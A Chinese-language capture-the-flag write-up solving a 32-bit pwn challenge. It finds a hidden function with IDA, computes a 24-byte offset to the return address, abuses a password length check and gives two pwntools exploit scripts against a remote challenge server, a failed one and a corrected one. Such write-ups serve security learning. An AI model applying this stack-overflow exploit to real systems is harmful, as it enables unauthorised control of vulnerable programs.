查保护机制NX,查架构32位
扔到IDA中,发现是让你登录,输入用户名,输入密码,再绕过检测即可
所以这里就是控制密码位数,然后在相应位置插入我们的目标地址,使得check_password函数的返回地址为目标地址
目标地址怎么找?
传统艺能[shift+F12]
找到了what_is_this
函数,其首地址为0x0804868B
绕过长度限制需要我们的payload
的长度为[260, 264]
目标地址填充在哪?
dest
的首地址为[ebp - 14h]
栈的结构是这样的:
位置 | 内容 |
---|---|
[ebp+4] | 返回地址 |
[ebp] | 旧的ebp的内容 |
… | … |
[ebp-14h] | dest首地址 |
所以在dest
到返回地址中间有24字节的内容
构造密码:
payload = `a` * 24 + p32(0x0804868B) + 'a' * 232
虚假的exploit
from pwn import *
p = remote('220.249.52.133', '33759')
call_system = 0x0804868B
payload = bytes('a' * 24, encoding='utf8') + p32(call_system) + bytes('a' * 232, encoding='utf8')
p.sendline('1')
p.sendline('admin')
p.sendline(payload)
p.interactive()
运行,直接被拦截 Invalid password
为什么不对呢?
发现输出了这个玩意
hello admin
aaaaaaaaaaaaaaaaaaa
原来是把password
的前面一部分当成username
了,那我就把username
的内容填充完整就好了
真实的exploit
from pwn import *
p = remote('220.249.52.133', '33759')
call_system = 0x0804868B
payload = bytes('a' * 24, encoding='utf8') + p32(call_system) + bytes('a' * 232, encoding='utf8')
p.sendline('1')
p.sendline('adminaaaaaaaaaaaaaaaaaaa')
p.sendline(payload)
p.interactive()
完结,撒花!